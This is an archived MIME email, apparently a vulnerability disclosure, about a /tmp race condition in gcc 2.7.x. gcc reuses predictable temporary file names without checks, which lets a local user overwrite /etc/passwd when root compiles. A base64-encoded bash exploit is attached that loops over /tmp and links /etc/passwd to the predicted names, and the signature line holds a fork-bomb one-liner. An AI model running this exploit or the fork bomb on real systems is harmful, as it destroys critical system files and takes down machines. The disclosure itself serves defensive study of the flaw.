This is a multi-part message in MIME format. ------=_NextPart_000_0005_01BD2207.5DF821A0 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable During compilation, gcc uses following temporary files: /tmp/ccXXXXXX.i /tmp/ccXXXXXX.s /tmp/ccXXXXXX.o Where XXXXXX means a 'unique' random number. Unique, but not quite. Only the first file (.i) is created properly, after a detailed checks. But next one (.s) is created within a noticable time interval using _extactly the same_ number and without performing any checks (!). Finally, the last file (.o) is created again in the same way, but '1' is appended to the sequence number. Now, we may leave a script, which periodically checks /tmp looking for cc*.i files. If any has been found, the script immediately creates link to /etc/passwd (or another vital file) using sequence number stripped from the .i file. Because no checks are performed by gcc, if our script was fast enough, target file may be overwritten when gcc has been launched by root! That's especially possible when large sources (more than 20-50 kB?), are compiled. I attached a simple and slow exploit. It works, but should become even more effective when you rewrite it to C... I've tested it under gcc 2.7.3.f.1 _______________________________________________________________________ Micha=B3 Zalewski [tel 9690] | finger 4 PGP = [lcamtufat_private] =3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] = ---------=3D ------=_NextPart_000_0005_01BD2207.5DF821A0 Content-Type: application/octet-stream; name="gcc-exploit" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="gcc-exploit" IyEvYmluL2Jhc2gKCiMgU2ltcGxlIEdDQyBleHBsb2l0ICh0ZXN0ZWQgdW5kZXIgMi43LjMuZi4x KQojIGJ5IE1pY2hhbCBaYWxld3NraSAobGNhbXR1ZkBzdGFzemljLndhdy5wbCkKIyAtLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFVzYWdlOiAic2NyZWVuIC4v Z2NjX2xuIiB0aGVuIEN0cmwrQSxECiMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0KIyBVZ2gsIGJsYWguLi4gU2hvdWxkIGJlIHdyaXR0ZW4gaW4gQyBmb3IKIyBi ZXR0ZXIgcGVyZm9ybWFuY2UsIGJ1dCBJIGhhdmUgbm8gdGltZSA6KQoKVklDVElNPS9ldGMvcGFz c3dkCgplY2hvICJHQ0MgZXhwbG9pdCBsYXVuY2hlZC4uLiIKCnJlbmljZSArMjAgJFBQSUQgPiYv ZGV2L251bGwKCmNkIC90bXAKCndoaWxlIFsgMSBdOyBkbwoKICBWPWBscyBjYyouaSAyPi9kZXYv bnVsbHxjdXQgLWYgMSAtZCAiLiJgCiAgCiAgaWYgWyAhICIkViIgPSAiIiBdOyB0aGVuCiAgICBs biAkVklDVElNICR7Vn0ucyA+Ji9kZXYvbnVsbAogICAgbG4gJFZJQ1RJTSAke1Z9MS5vID4mL2Rl di9udWxsCiAgICBlY2hvICJBbSBJIGZhc3QgZW5vdWdoPyIKICBmaQoKZG9uZQo= ------=_NextPart_000_0005_01BD2207.5DF821A0--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:39:35 PDT